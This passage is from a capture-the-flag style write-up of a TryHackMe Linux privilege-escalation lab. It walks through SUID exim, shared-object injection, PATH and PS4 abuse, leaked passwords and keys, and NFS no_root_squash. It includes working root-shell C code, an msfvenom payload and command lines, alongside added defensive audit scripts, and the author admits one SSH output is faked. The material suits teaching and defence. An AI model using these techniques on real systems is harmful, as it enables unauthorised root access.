-rwsr-xr-x 1 root root 94992 Dec 13 2014 /sbin/mount.nfs
/usr/sbin/exim-4.84-3 is in the above list – this version is exploitable! A local privilege escalation exploit, to be exact (included in /home/user/tools/suid/exim/, named cve-2016-1531.sh).
- Let's exploit it! 😉
user@debian:~$ /home/user/tools/suid/exim/cve-2016-1531.sh
[ CVE-2016-1531 local root exploit
sh-4.1# /bin/bash
root@debian:~# id
uid=0(root) gid=1000(user) groups=0(root)
root@debian:~#
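The find command above is the attacker's inventory; the same output is also the defender's, once it is diffed against a baseline and checked for binaries living outside package-managed directories or carrying a known-vulnerable version in their name. The script below is an added example for this writeup, not part of the room: FIND_OUTPUT is a constructed subset of the listing above, BASELINE is a constructed "before" snapshot, and KNOWN_VULNERABLE holds only the entry the writeup itself names (exim 4.84-3, CVE-2016-1531).

```python
"""Turn the `find` output from Task 11 into an inventory and diff it against a
baseline, so that a new setuid binary (like the /tmp/rootbash the earlier tasks
create) or a known-vulnerable one stands out.

Added example for this writeup, not part of the room. FIND_OUTPUT is a
constructed subset of the room's listing; BASELINE is a constructed snapshot
taken "before" the attack; KNOWN_VULNERABLE holds the one entry the writeup
names (exim 4.84-3, CVE-2016-1531).
"""
import re

FIND_OUTPUT = """-rwsr-xr-x 1 root root 37552 Feb 15 2011 /usr/bin/chsh
-rwsr-xr-x 2 root root 168136 Jan 5 2016 /usr/bin/sudo
-rwsr-xr-x 1 root root 43280 Feb 15 2011 /usr/bin/passwd
-rwxr-sr-x 1 root shadow 56976 Feb 15 2011 /usr/bin/chage
-rwsr-sr-x 1 root staff 9861 May 14 2017 /usr/local/bin/suid-so
-rwsr-sr-x 1 root staff 6883 May 14 2017 /usr/local/bin/suid-env
-rwsr-sr-x 1 root staff 6899 May 14 2017 /usr/local/bin/suid-env2
-rwsr-xr-x 1 root root 963691 May 13 2017 /usr/sbin/exim-4.84-3
-rwsr-xr-x 1 root root 34024 Feb 15 2011 /bin/su
-rwsr-sr-x 1 root root 926536 Nov 24 03:55 /tmp/rootbash
"""

# Directories where package-managed setuid binaries normally live.
PACKAGE_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/lib/", "/usr/libexec/")
# Constructed baseline: the same host before the attack.
BASELINE = {"/usr/bin/chsh", "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/chage",
            "/usr/local/bin/suid-so", "/usr/local/bin/suid-env", "/usr/local/bin/suid-env2",
            "/usr/sbin/exim-4.84-3", "/bin/su"}
# Name pattern -> advisory, from the writeup's own exim finding.
KNOWN_VULNERABLE = {re.compile(r"/exim-4\.84-3$"): "CVE-2016-1531 (local root)"}


def parse_find_output(text):
    """Return dicts with path, owner, group, and whether setuid/setgid is set."""
    entries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split()
        mode, owner, group, path = fields[0], fields[2], fields[3], fields[-1]
        entries.append({
            "path": path, "owner": owner, "group": group,
            "setuid": mode[3] in "sS", "setgid": mode[6] in "sS",
        })
    return entries


def unusual_locations(entries):
    """Setuid/setgid files outside package directories deserve a second look."""
    return [e["path"] for e in entries if not e["path"].startswith(PACKAGE_DIRS)]


def known_vulnerable(entries):
    return [(e["path"], adv) for e in entries for pat, adv in KNOWN_VULNERABLE.items()
            if pat.search(e["path"])]


def new_since_baseline(entries, baseline=BASELINE):
    """Paths that are setuid/setgid now but were not in the baseline snapshot."""
    return sorted(e["path"] for e in entries if e["path"] not in baseline)


def setuid_root(entries):
    """The subset that actually grants uid 0: setuid bit and owned by root."""
    return [e["path"] for e in entries if e["setuid"] and e["owner"] == "root"]


if __name__ == "__main__":
    inv = parse_find_output(FIND_OUTPUT)
    print("unusual:", unusual_locations(inv))
    print("known vulnerable:", known_vulnerable(inv))
    print("new since baseline:", new_since_baseline(inv))
```

Run periodically with a stored baseline, the diff is what catches the /tmp/rootbash that several tasks in this room leave behind; the "unusual location" list is what would have flagged the three /usr/local/bin binaries before anyone ran strings on them.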
Task 12 – SUID / SGID Executables – Shared Object Injection
From the previous search, we also have /usr/local/bin/suid-so – this is vulnerable to shared object injection.
- First, execute the file and note that currently it displays a progress bar before exiting:
user@debian:~$ suid-so
Calculating something, please wait...
[=====================================================================>] 99 %
Done.
user@debian:~$
- Run strace on the file and search the output for open/access calls, and for "no such file" errors:
user@debian:~$ strace /usr/local/bin/suid-so 2>&1 | grep -iE "open|access|no such file"
access("/etc/suid-debug", F_OK) = -1 ENOENT (No such file or directory)
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY) = 3
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/libdl.so.2", O_RDONLY) = 3
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/usr/lib/libstdc++.so.6", O_RDONLY) = 3
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/libm.so.6", O_RDONLY) = 3
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/libgcc_s.so.1", O_RDONLY) = 3
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/libc.so.6", O_RDONLY) = 3
open("/home/user/.config/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory)
Looking at the bottom line, it looks like suid-so looks for a file named libcalc.so in /home/user/.config/ (our home directory!).
- Using the example shared object code in /home/user/tools/suid/ named libcalc.c (which simply calls a Bash shell), let's compile the code into a shared object at the location we found from suid-so above, and see what happens when we run suid-so now:
user@debian:~$ mkdir .config
user@debian:~$ gcc -shared -fPIC -o /home/user/.config/libcalc.so /home/user/tools/suid/libcalc.c
user@debian:~$ suid-so
Calculating something, please wait...
bash-4.1# id
uid=0(root) gid=1000(user) egid=50(staff) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)
SOURCE >> libcalc.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>   /* setuid() */
/* Runs when suid-so loads the library, before any of its own code. */
static void inject() __attribute__((constructor));
void inject() {
setuid(0);               /* make the real uid match the effective uid the SUID bit gave us */
system("/bin/bash -p");
}
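The strace step above is a generic detection, not just an attack step: a setuid binary that probes for a shared object in a path an unprivileged user can write is the finding, and it shows up as an ENOENT on a `.so` path. The parser below is an added example for this writeup, not part of the room; STRACE is constructed from the output above plus one modern-style openat() line so that both syntaxes are handled, and WRITABLE_PREFIXES stands in for a real ownership check.

```python
"""Find the dangling library load that Task 12 exploits: a setuid binary
probing for a shared object in a directory an unprivileged user can write.

Added example for this writeup, not part of the room. STRACE is constructed
from the room's output plus one modern-style openat() line so both syntaxes
are covered; WRITABLE_PREFIXES stands in for a real ownership check.
"""
import re

STRACE = """access("/etc/suid-debug", F_OK) = -1 ENOENT (No such file or directory)
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY) = 3
open("/lib/libc.so.6", O_RDONLY) = 3
open("/home/user/.config/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/tmp/plugins/libextra.so.1", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
"""

WRITABLE_PREFIXES = ("/home/", "/tmp/", "/var/tmp/", "/dev/shm/")
MISSING_RE = re.compile(
    r'^(?P<call>open|openat|access|stat|execve)\((?:AT_FDCWD, )?"(?P<path>[^"]+)".*= -1 ENOENT')
SHARED_OBJECT_RE = re.compile(r"\.so(\.\d+)*$")


def missing_paths(strace_text):
    """Every path a syscall looked for and did not find, with the call name."""
    found = []
    for line in strace_text.splitlines():
        m = MISSING_RE.match(line)
        if m:
            found.append((m.group("call"), m.group("path")))
    return found


def hijackable_libraries(strace_text, writable_prefixes=WRITABLE_PREFIXES):
    """Missing shared objects under a writable prefix: an attacker can create them."""
    return [path for _call, path in missing_paths(strace_text)
            if SHARED_OBJECT_RE.search(path) and path.startswith(writable_prefixes)]


def explain(paths):
    """What a defender does with each hit."""
    return [f"{p}: setuid program loads from a user-writable path; "
            "load plugins only from root-owned directories (or drop the setuid bit)" for p in paths]


if __name__ == "__main__":
    for line in explain(hijackable_libraries(STRACE)):
        print(line)
```

/etc/ld.so.preload is also missing in the trace but is not reported: it lives under /etc, which only root can write, which is the whole distinction this check draws.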
Task 13 – SUID / SGID Executables – Environment Variables
Still looking at the SUID/SGID binary list we got from Task 11, we have another exploitable binary, /usr/local/bin/suid-env. This inherits the user's PATH environment variable and attempts to execute programs without a full path – this one is ripe for the picking!
- First, let's run it and see what it is trying to do:
user@debian:~/tools/sudo$ suid-env
[....] Starting web server: apache2httpd (pid 1680) already running
. ok
- OK… let's dig a bit deeper using strings:
user@debian:~/tools/sudo$ strings /usr/local/bin/suid-env
/lib64/ld-linux-x86-64.so.2
5q;Xq
__gmon_start__
libc.so.6
setresgid
setresuid
system
__libc_start_main
GLIBC_2.2.5
fff.
fffff.
l$ L
t$(L
|$0H
service apache2 start
- The last line, service apache2 start, is not pointing to the full path of service (/usr/sbin/service). Let's compile some code from our home directory that simply spawns a Bash shell, ironically (or not) called service.c… do you see where this is going yet? 🙂
user@debian:~$ gcc -o service /home/user/tools/suid/service.c
user@debian:~$
- OK, now it's showtime! 🙂
user@debian:~$ PATH=.:$PATH /usr/local/bin/suid-env
root@debian:~# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)
SOURCE >> service.c
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setuid() */
/* Found via PATH instead of /usr/sbin/service, so it runs with suid-env's effective uid. */
int main() {
setuid(0);
system("/bin/bash -p");
return 0;
}
Task 14 – SUID / SGID Executables – Abusing Shell Features (#1)
NOTE: This will not work on Bash versions above 4.2-048.
- While still looking at the SUID/SGID binary list we got from Task 11, we also see /usr/local/bin/suid-env2. This executable is identical to suid-env except it uses the absolute path of service:
user@debian:~$ strings /usr/local/bin/suid-env2
/lib64/ld-linux-x86-64.so.2
__gmon_start__
libc.so.6
setresgid
setresuid
system
__libc_start_main
GLIBC_2.2.5
fff.
fffff.
l$ L
t$(L
|$0H
/usr/sbin/service apache2 start
In Bash versions below 4.2-048 it is possible to define shell functions with names that resemble file paths, then export those functions so that they are used instead of any actual executable at that file path.
- Let’s check our Bash version:
user@debian:~$ /bin/bash --version
GNU bash, version 4.1.5(1)-release (x86_64-pc-linux-gnu)
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software; you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
user@debian:~$
- Yippee! Let's create a bash function with the name "/usr/sbin/service" that creates a new Bash shell (using -p to preserve the root permissions) and export the function, then we run suid-env2 again and voila! 😉
user@debian:~$ function /usr/sbin/service { /bin/bash -p; }
user@debian:~$ export -f /usr/sbin/service
user@debian:~$ suid-env2
root@debian:~# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)
Task 15 – SUID / SGID Executables – Abusing Shell Features (#2)
NOTE: This will not work on Bash versions 4.4 and above.
When in debugging mode, Bash uses the environment variable PS4 to display an extra prompt for debugging statements.
- Run the /usr/local/bin/suid-env2 executable with Bash debugging enabled and the PS4 variable set to an embedded command that will create an SUID version of /bin/bash:
user@debian:~$ env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)' /usr/local/bin/suid-env2
/usr/sbin/service apache2 start
basename /usr/sbin/service
VERSION='service ver. 0.91-ubuntu1'
basename /usr/sbin/service
USAGE='Usage: service < option > | --status-all | [ service_name [ command | --full-restart ] ]'
SERVICE=
ACTION=
SERVICEDIR=/etc/init.d
OPTIONS=
'[' 2 -eq 0 ']'
cd /
'[' 2 -gt 0 ']'
case "${1}" in
'[' -z '' -a 2 -eq 1 -a apache2 = --status-all ']'
'[' 2 -eq 2 -a start = --full-restart ']'
'[' -z '' ']'
SERVICE=apache2
shift
'[' 1 -gt 0 ']'
case "${1}" in
'[' -z apache2 -a 1 -eq 1 -a start = --status-all ']'
'[' 1 -eq 2 -a '' = --full-restart ']'
'[' -z apache2 ']'
'[' -z '' ']'
ACTION=start
shift
'[' 0 -gt 0 ']'
'[' -r /etc/init/apache2.conf ']'
'[' -x /etc/init.d/apache2 ']'
exec env -i LANG= PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin TERM=dumb /etc/init.d/apache2 start
Starting web server: apache2httpd (pid 1680) already running
.
user@debian:~$ ls -al /tmp/rootbash
-rwsr-sr-x 1 root root 926536 Nov 24 05:03 /tmp/rootbash
- Then, as before, it's as simple as running this, and we are root!
user@debian:~$ /tmp/rootbash -p
rootbash-4.1# id
uid=1000(user) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)
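Tasks 13, 14 and 15 all come down to a setuid program calling system() with an environment it did not sanitise, and the last two additionally depend on the Bash version (the 4.2-048 and 4.4 thresholds the notes give). The checker below is an added example for this writeup, not part of the room: it parses a `bash --version` line, reports which of the two shell behaviours that version still has, and scans an environment for the three patterns used above (a PATH with `.` or a user-writable directory, an exported function whose name is a path, and SHELLOPTS=xtrace with a PS4 containing command substitution). The version string and the environment dict are constructed to mirror the room; on a live host the inputs would be `bash --version` and os.environ.

```python
"""Check the conditions behind Tasks 13-15: a PATH a setuid program will
trust, exported shell functions that shadow absolute paths (bash < 4.2-048),
and PS4 command substitution under xtrace (bash < 4.4).

Added example for this writeup, not part of the room. The version string and
the environment dict are constructed to mirror the room; a real check would use
`bash --version` and os.environ.
"""
import re

BASH_VERSION_LINE = "GNU bash, version 4.1.5(1)-release (x86_64-pc-linux-gnu)"

# Constructed environment with the three problem patterns from Tasks 13-15.
ENV = {
    "PATH": ".:/usr/local/bin:/usr/bin:/bin",
    "/usr/sbin/service": "() {  /bin/bash -p\n}",
    "SHELLOPTS": "xtrace",
    "PS4": "$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)",
    "HOME": "/home/user",
}
UNPRIVILEGED_WRITABLE = {"/home/user", "/tmp"}

FUNCTION_EXPORT_THRESHOLD = (4, 2, 48)   # fixed in bash 4.2 patch 48
PS4_THRESHOLD = (4, 4, 0)                # privileged shells stop expanding PS4 from 4.4


def parse_bash_version(line):
    """'GNU bash, version 4.1.5(1)-release ...' -> (4, 1, 5)."""
    m = re.search(r"version (\d+)\.(\d+)\.(\d+)", line)
    if not m:
        raise ValueError("unrecognised bash --version output")
    return tuple(int(x) for x in m.groups())


def bash_weaknesses(version):
    """Which of the two shell behaviours this version still exhibits."""
    weak = []
    if version < FUNCTION_EXPORT_THRESHOLD:
        weak.append("exported function named like a path overrides that path (Task 14)")
    if version < PS4_THRESHOLD:
        weak.append("PS4 command substitution runs under SHELLOPTS=xtrace (Task 15)")
    return weak


def exported_functions(env):
    """Names of functions exported into the environment, old and new bash styles."""
    names = []
    for key, value in env.items():
        if key.startswith("BASH_FUNC_"):                 # post-Shellshock naming
            names.append(re.sub(r"^BASH_FUNC_|(%%|\(\))$", "", key))
        elif value.startswith("() {"):                   # pre-4.3 naming: bare name
            names.append(key)
    return names


def environment_findings(env, writable=UNPRIVILEGED_WRITABLE):
    """The three environment patterns a setuid program must not trust."""
    findings = []
    for entry in env.get("PATH", "").split(":"):
        if entry in ("", ".") or not entry.startswith("/") or entry in writable:
            findings.append(f"PATH entry {entry!r} lets a relative command be hijacked (Task 13)")
    for name in exported_functions(env):
        if "/" in name:
            findings.append(f"exported function {name!r} shadows an absolute path (Task 14)")
    if "xtrace" in env.get("SHELLOPTS", "").split(":") and re.search(r"\$\(|`", env.get("PS4", "")):
        findings.append("SHELLOPTS=xtrace with a PS4 that runs commands (Task 15)")
    return findings


if __name__ == "__main__":
    print(bash_weaknesses(parse_bash_version(BASH_VERSION_LINE)))
    for finding in environment_findings(ENV):
        print(finding)
```

The durable fix is not in the environment at all: a setuid program should reset PATH and drop SHELLOPTS/PS4 before calling system(), or better, exec the target directly by absolute path with an explicit environment, as the `exec env -i ... /etc/init.d/apache2 start` line in the trace above happens to do for its own child.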
Task 16 – Passwords & Keys – History Files
If a user accidentally types their password on the command line instead of into a password prompt, it may get recorded in a "history file". Bash, for example, saves your command history in ~/.bash_history.
- Let's see if the owner of this box left behind any clues…:
user@debian:~$ cat ~/.*history
ls -al
cat .bash_history
ls -al
mysql -h somehost.local -uroot -ppassword123
exit
cd /tmp
clear
ifconfig
netstat -antp
nano myvpn.ovpn
- Looking at the above output, we can see they tried to access MySQL via the command line, password and all! … worse still, they have reused that password on the actual root account!
user@debian:~$ su root
Password: password123
root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)
root@debian:/home/user#
What is the full mysql command the user executed?
Task 17 – Passwords & Keys – Config Files
Config files can be a treasure-trove of information – even passwords!
- Note below, the user has a file named myvpn.ovpn – let's have a look:
user@debian:~$ ls
myvpn.ovpn tools
user@debian:~$ cat myvpn.ovpn
client
dev tun
proto udp
remote 10.10.10.10 1194
resolv-retry infinite
nobind
persist-key
persist-tun
ca ca.crt
tls-client
remote-cert-tls server
auth-user-pass /etc/openvpn/auth.txt
comp-lzo
verb 1
reneg-sec 0
- There is a line in this file starting with auth-user-pass that points to a text file…
user@debian:~$ cat /etc/openvpn/auth.txt
root
password123
Hello there! Root login details! 😉
What file did you find the root user's credentials in?
Task 18 – Passwords & Keys – SSH Keys
Sometimes users make backups of important files, but fail to secure them with the correct permissions…
- Let’s check / for any hidden files or folders:
user@debian:~$ ls -la /
total 96
drwxr-xr-x 22 root root 4096 Aug 25 2019 .
drwxr-xr-x 22 root root 4096 Aug 25 2019 ..
drwxr-xr-x 2 root root 4096 Aug 25 2019 bin
drwxr-xr-x 3 root root 4096 May 12 2017 boot
drwxr-xr-x 12 root root 2820 Nov 24 02:59 dev
drwxr-xr-x 67 root root 4096 Nov 24 05:20 etc
drwxr-xr-x 3 root root 4096 May 15 2017 home
lrwxrwxrwx 1 root root 30 May 12 2017 initrd.img -> boot/initrd.img-2.6.32-5-amd64
drwxr-xr-x 12 root root 12288 May 14 2017 lib
lrwxrwxrwx 1 root root 4 May 12 2017 lib64 -> /lib
drwx------ 2 root root 16384 May 12 2017 lost+found
drwxr-xr-x 3 root root 4096 May 12 2017 media
drwxr-xr-x 2 root root 4096 Jun 11 2014 mnt
drwxr-xr-x 2 root root 4096 May 12 2017 opt
dr-xr-xr-x 96 root root 0 Nov 24 02:57 proc
drwx------ 5 root root 4096 May 15 2020 root
drwxr-xr-x 2 root root 4096 May 13 2017 sbin
drwxr-xr-x 2 root root 4096 Jul 21 2010 selinux
drwxr-xr-x 2 root root 4096 May 12 2017 srv
drwxr-xr-x 2 root root 4096 Aug 25 2019 .ssh
drwxr-xr-x 13 root root 0 Nov 24 02:57 sys
drwxrwxrwt 2 root root 4096 Nov 24 05:30 tmp
drwxr-xr-x 11 root root 4096 May 13 2017 usr
drwxr-xr-x 14 root root 4096 May 13 2017 var
lrwxrwxrwx 1 root root 27 May 12 2017 vmlinuz -> boot/vmlinuz-2.6.32-5-amd64
- Notice the .ssh folder? Let’s investigate that one further…
user@debian:~$ ls -al /.ssh
total 12
drwxr-xr-x 2 root root 4096 Aug 25 2019 .
drwxr-xr-x 22 root root 4096 Aug 25 2019 ..
-rw-r--r-- 1 root root 1679 Aug 25 2019 root_key
- A world-readable file named root_key – it’s a PRIVATE KEY:
user@debian:~$ cat /.ssh/root_key
-----BEGIN RSA PRIVATE KEY-----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-----END RSA PRIVATE KEY-----
- Let’s dump this into a file locally and see if it lets us connect!
❯ v root_key
❯ chmod 600 root_key
❯ ssh -i root_key root@10.10.200.127
Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 25 14:02:49 2019 from 192.168.1.2
root@debian:~#
NOTE: This didn’t actually work on my box when trying to connect to this box… I have also had issues with Host Key Algorithms and have to force SSH connections to this box with -oHostKeyAlgorithms=+ssh-rsa to connect… the above output is unfortunately faked. 🙁
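Tasks 17 and 18 are the same mistake twice: a secret sitting in a file that anyone on the box can read (`/etc/openvpn/auth.txt` via the `auth-user-pass` directive, and `/.ssh/root_key`). As an added example (my own code, not the room's), here is a small audit that walks a directory tree and reports world-readable files that contain a private key, plus any OpenVPN config whose `auth-user-pass` file is world-readable. It builds a throwaway tree in a temp directory with placeholder contents that mirror the two findings above, so it runs anywhere; point `audit_tree` at `/` to use it for real.

```python
"""Audit a directory tree for readable credential files and private keys.

Added example, not code from the TryHackMe room. Findings mirror the two
cases in the writeup: a world-readable private key and a world-readable
OpenVPN auth-user-pass file.
"""
import os
import re
import stat
import tempfile

KEY_HEADER = re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----")
# [ \t]+ rather than \s+ so a bare "auth-user-pass" (interactive prompt) does
# not swallow the next line's token as a filename
AUTH_USER_PASS = re.compile(r"^[ \t]*auth-user-pass[ \t]+(\S+)", re.MULTILINE)


def is_world_readable(path):
    """True if the 'other' read bit is set on path."""
    return bool(os.stat(path).st_mode & stat.S_IROTH)


def ovpn_credential_file(ovpn_text):
    """Return the path named by an 'auth-user-pass <file>' directive, or None."""
    m = AUTH_USER_PASS.search(ovpn_text)
    return m.group(1) if m else None


def audit_tree(root):
    """Walk root and return sorted (kind, path) findings."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", errors="ignore") as fh:
                    head = fh.read(4096)
            except OSError:
                continue
            if KEY_HEADER.search(head) and is_world_readable(path):
                findings.append(("world-readable private key", path))
            if name.endswith(".ovpn"):
                cred = ovpn_credential_file(head)
                if cred:
                    # absolute paths are resolved inside the audited tree
                    if cred.startswith("/"):
                        cred_path = os.path.join(root, cred.lstrip("/"))
                    else:
                        cred_path = os.path.join(dirpath, cred)
                    if os.path.exists(cred_path) and is_world_readable(cred_path):
                        findings.append(("world-readable VPN credential file", cred_path))
    return sorted(findings)


def build_demo_tree():
    """Construct a throwaway tree with placeholder files (constructed data, no real keys)."""
    root = tempfile.mkdtemp(prefix="privesc-audit-")
    os.makedirs(os.path.join(root, ".ssh"))
    os.makedirs(os.path.join(root, "etc", "openvpn"))
    os.makedirs(os.path.join(root, "home", "user"))

    key = os.path.join(root, ".ssh", "root_key")
    with open(key, "w") as fh:
        fh.write("-----BEGIN RSA PRIVATE KEY-----\nPLACEHOLDER\n-----END RSA PRIVATE KEY-----\n")
    os.chmod(key, 0o644)  # the mistake: readable by everyone

    with open(os.path.join(root, "home", "user", "myvpn.ovpn"), "w") as fh:
        fh.write("client\ndev tun\nauth-user-pass /etc/openvpn/auth.txt\n")
    auth = os.path.join(root, "etc", "openvpn", "auth.txt")
    with open(auth, "w") as fh:
        fh.write("root\nPLACEHOLDER-PASSWORD\n")
    os.chmod(auth, 0o644)  # same mistake

    # a correctly protected key for contrast; must not be reported
    ok = os.path.join(root, "home", "user", "id_ok")
    with open(ok, "w") as fh:
        fh.write("-----BEGIN OPENSSH PRIVATE KEY-----\nPLACEHOLDER\n-----END OPENSSH PRIVATE KEY-----\n")
    os.chmod(ok, 0o600)
    return root


if __name__ == "__main__":
    for kind, path in audit_tree(build_demo_tree()):
        print(f"{kind}: {path}")
```

The fix in both cases is the same: `chmod 600` and root ownership on the secret file, and for the SSH case, revoking the exposed key from `authorized_keys` since a key that was world-readable has to be treated as copied.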
Task 19 – NFS
Files created via NFS inherit the remote user’s ID. If the user is root, and root squashing is enabled, the ID will instead be set to the "nobody" user.
- Check the NFS share configuration on the target:
user@debian:~$ cat /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
# to NFS clients. See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check)
#
/tmp *(rw,sync,insecure,no_root_squash,no_subtree_check)
#/tmp *(rw,sync,insecure,no_subtree_check)
- Notice how the only enabled line has no_root_squash set as an option? This gives us a window to remotely create a backdoor (on the attacking machine)! 😉
❯ sudo mkdir tmp
❯ sudo mount -o rw,vers=2 10.10.200.127:/tmp /home/stimpz/tryhackme/linux_privesc/tmp
❯ cd tmp
❯ ls
backup.tar.gz rootbash root.pm useless
❯ sudo msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o shell
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 48 bytes
Final size of elf file: 132 bytes
Saved as: shell
❯ sudo chmod +xs shell
❯ ls -al
total 1028
drwxrwxrwt 2 root root 4096 Nov 24 22:15 .
drwxr-xr-x 1 stimpz stimpz 88 Nov 24 22:10 ..
-rw-r--r-- 1 root root 94900 Nov 24 22:15 backup.tar.gz
-rwsr-sr-x 1 root root 926536 Nov 24 22:15 rootbash
-rw-r--r-- 1 stimpz stimpz 60 Nov 24 20:04 root.pm
-rwsr-sr-x 1 root root 132 Nov 24 22:14 shell
-rw-r--r-- 1 root root 29 Nov 24 19:09 useless
- Now let’s try running that file on the target:
user@debian:~$ /tmp/shell
bash-4.1# id
uid=1000(user) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)
What is the name of the option that disables root squashing?
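Spotting `no_root_squash` by eye works for a two-line `/etc/exports`, but it is easy to miss on a server with a dozen exports. As an added example (my own code, not from the room), here is a small parser for the `exports(5)` format that splits each line into path and per-client option lists, then flags the combinations that matter for this attack: `no_root_squash` (remote root keeps uid 0 on the share), `insecure` (requests accepted from unprivileged client ports), and `rw` exported to `*`. The sample input is constructed from the file shown above plus one safe export for contrast.

```python
"""Parse /etc/exports and flag options that let a remote root drop SUID files.

Added example, not code from the TryHackMe room.
"""
import re

# Constructed sample: the /tmp lines come from the /etc/exports above, the
# /srv/share line is a safe export added for contrast.
SAMPLE_EXPORTS = """\
# /etc/exports: the access control list for filesystems which may be exported
# to NFS clients. See exports(5).
/tmp *(rw,sync,insecure,no_root_squash,no_subtree_check)
#/tmp *(rw,sync,insecure,no_subtree_check)
/srv/share 10.0.0.0/24(ro,sync,root_squash,no_subtree_check)
"""

# "host(opt,opt)" or a bare "host" with default options
CLIENT_SPEC = re.compile(r"(?P<host>\S+?)\((?P<opts>[^)]*)\)|(?P<bare>\S+)")


def parse_exports(text):
    """Return [(path, [(client, [options, ...]), ...]), ...] for non-comment lines."""
    exports = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        parts = line.split(None, 1)
        path = parts[0]
        rest = parts[1] if len(parts) > 1 else ""
        clients = []
        for m in CLIENT_SPEC.finditer(rest):
            if m.group("bare"):
                clients.append((m.group("bare"), []))
            else:
                opts = [o.strip() for o in m.group("opts").split(",") if o.strip()]
                clients.append((m.group("host"), opts))
        exports.append((path, clients))
    return exports


def assess(exports):
    """Return one human-readable finding per risky client spec."""
    findings = []
    for path, clients in exports:
        for host, opts in clients:
            issues = []
            if "no_root_squash" in opts:
                issues.append("no_root_squash (remote root keeps uid 0, can write SUID-root files)")
            if "insecure" in opts:
                issues.append("insecure (requests accepted from unprivileged source ports)")
            if host == "*" and "rw" in opts:
                issues.append("rw exported to any host")
            if issues:
                findings.append(f"{path} {host}: " + "; ".join(issues))
    return findings


if __name__ == "__main__":
    for finding in assess(parse_exports(SAMPLE_EXPORTS)):
        print(finding)
```

`root_squash` is the default for a reason: with it on, files written by a remote root land owned by `nobody`, so the SUID trick above never produces a root-owned binary. Restricting the client list and mounting shares `nosuid` on the clients close the rest of the window.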
Task 20 – Kernel Exploits
Kernel exploits can leave a system in an unstable state, which is why you should only run them as a last resort.
- Run the Linux Exploit Suggester 2 tool to identify potential kernel exploits on the current system:
user@debian:~$ perl /home/user/tools/kernel-exploits/linux-exploit-suggester-2/linux-exploit-suggester-2.pl
#############################
Linux Exploit Suggester 2
#############################
Local Kernel: 2.6.32
Searching 72 exploits...
Possible Exploits
[1] american-sign-language
CVE-2010-4347
Source: http://www.securityfocus.com/bid/45408
[2] can_bcm
CVE-2010-2959
Source: http://www.exploit-db.com/exploits/14814
[3] dirty_cow
CVE-2016-5195
Source: http://www.exploit-db.com/exploits/40616
[4] exploit_x
CVE-2018-14665
Source: http://www.exploit-db.com/exploits/45697
[5] half_nelson1
Alt: econet CVE-2010-3848
Source: http://www.exploit-db.com/exploits/17787
[6] half_nelson2
Alt: econet CVE-2010-3850
Source: http://www.exploit-db.com/exploits/17787
[7] half_nelson3
Alt: econet CVE-2010-4073
Source: http://www.exploit-db.com/exploits/17787
[8] msr
CVE-2013-0268
Source: http://www.exploit-db.com/exploits/27297
[9] pktcdvd
CVE-2010-3437
Source: http://www.exploit-db.com/exploits/15150
[10] ptrace_kmod2
Alt: ia32syscall,robert_you_suck CVE-2010-3301
Source: http://www.exploit-db.com/exploits/15023
[11] rawmodePTY
CVE-2014-0196
Source: http://packetstormsecurity.com/files/download/126603/cve-2014-0196-md.c
[12] rds
CVE-2010-3904
